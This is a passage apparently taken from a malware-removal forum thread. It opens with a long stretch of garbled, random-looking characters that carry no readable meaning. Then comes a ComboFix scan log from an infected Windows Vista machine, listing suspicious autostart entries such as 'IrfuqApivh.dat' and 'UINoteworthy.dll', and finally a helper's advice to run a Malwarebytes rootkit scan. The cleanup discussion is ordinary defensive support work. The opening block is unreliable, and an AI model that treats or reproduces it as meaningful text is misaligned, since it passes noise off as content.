}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&JzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@

.

((((((((((((((((((((((((( Files Created from 2014-07-24 to 2014-08-24 )))))))))))))))))))))))))))))))

.

2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp

2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp

2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp

2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST

2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys

2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware

2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys

2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys

2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys

2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp

2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner

2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT

2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy

2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys

2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys

2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE

2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK

2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro

2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development

2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs

2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll

2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys

2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy

2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft

2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014

2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData

2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014

2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc

2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers

2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc

2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate

2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer

2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys

2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe

2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys

2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag

2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft

2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 5

2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod

2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1

2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll

2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll

2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll

2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll

2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll

2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime

2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch

2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495

2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495

2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir

2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu

2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh

2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll

.

(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys

.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))

.

*Note* empty entries & legit default entries are not shown

REGEDIT4

.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]

"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]

"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]

"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]

"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]

"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]

"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]

"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]

"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]

"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]

"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]

"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]

"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]

"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]

"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]

"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]

"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]

"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]

"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]

"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]

"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]

"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]

"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]

"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]

"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]

"EnableLUA"= 0 (0x0)

"EnableUIADesktopToggle"= 0 (0x0)

"HideFastUserSwitching"= 0 (0x0)

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]

"UseDefaultTile"= 0 (0x0)

.

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]

BootExecute REG_MULTI_SZ autocheck autochk * \0BootDefrag.exe\0sasnative32

.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]

@=""

.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]

@=""

.

S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]

HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12

HPService REG_MULTI_SZ HPSLPSVC

hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc

LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache

.

Contents of the 'Scheduled Tasks' folder

.

2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job

- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]

.

2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job

- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]

.

------- Supplementary Scan -------

.

uStart Page = hxxp://www.google.com/

uInternet Settings,ProxyOverride = *.local;<local>

TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3

.

**************************************************************************

.

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net

Rootkit scan 2014-08-24 15:40

Windows 6.0.6002 Service Pack 2 NTFS

.

scanning hidden processes ...

.

scanning hidden autostart entries ...

.

scanning hidden files ...

.

scan completed successfully

hidden files: 0

.

**************************************************************************

.

--------------------- LOCKED REGISTRY KEYS ---------------------

.

[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]

@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)

.

------------------------ Other Running Processes ------------------------

.

c:\windows\system32\Ati2evxx.exe

c:\program files\Dell\DellDock\DockLogin.exe

c:\windows\system32\WLANExt.exe

c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe

c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

c:\program files\AVG\AVG10\avgfws.exe

c:\program files\AVG\AVG10\avgwdsvc.exe

c:\program files\Bonjour\mDNSResponder.exe

c:\windows\dwrcs\DWRCS.EXE

c:\windows\system32\lxblcoms.exe

c:\windows\system32\msiexec.exe

c:\program files\HTC\Internet Pass-Through\PassThruSvr.exe

c:\program files\Sony\PMB\PMBDeviceInfoProvider.exe

c:\program files\NETGEAR\WNA1100\WifiSvc.exe

c:\windows\system32\WUDFHost.exe

c:\program files\AVG\AVG10\avgnsx.exe

c:\program files\Dell\DellDock\DellDock.exe

c:\program files\Glary Utilities 5\Integrator.exe

c:\windows\RtHDVCpl.exe

c:\windows\System32\rundll32.exe

c:\program files\ActivIdentity\ActivClient\acsagent.exe

c:\program files\HP\Digital Imaging\bin\hpqtra08.exe

c:\program files\NETGEAR\WNA1100\WNA1100.exe

c:\program files\Microsoft Office\Office12\ONENOTEM.EXE

c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE

c:\windows\ehome\ehmsas.exe

c:\windows\system32\rundll32.exe

c:\program files\iPod\bin\iPodService.exe

c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe

c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe

c:\program files\HP\Digital Imaging\bin\hpqbam08.exe

c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe

c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe

c:\\?\c:\windows\system32\wbem\WMIADAP.EXE

c:\program files\Windows Media Player\wmpnetwk.exe

c:\windows\system32\rundll32.exe

c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe

.

**************************************************************************

.

Completion time: 2014-08-24 15:45:51 - machine was rebooted

ComboFix-quarantined-files.txt 2014-08-24 19:45

ComboFix2.txt 2014-08-23 20:16

ComboFix3.txt 2014-08-23 18:22

.

Pre-Run: 238,198,915,072 bytes free

Post-Run: 238,199,603,200 bytes free

.

- - End Of File - - 836BEC6E629D99F479DEE501CB2CA845

5C616939100B85E558DA92B899A0FC36

Naathim · August 24, 2014

Good so far.

51a46ae42d560-malwarebytes_anti_malware. Scan with Malwarebytes' Anti-Malware

Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.

First of all select update.
Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.
Click the Scan tab, choose Threat Scan is checked and click Scan Now.
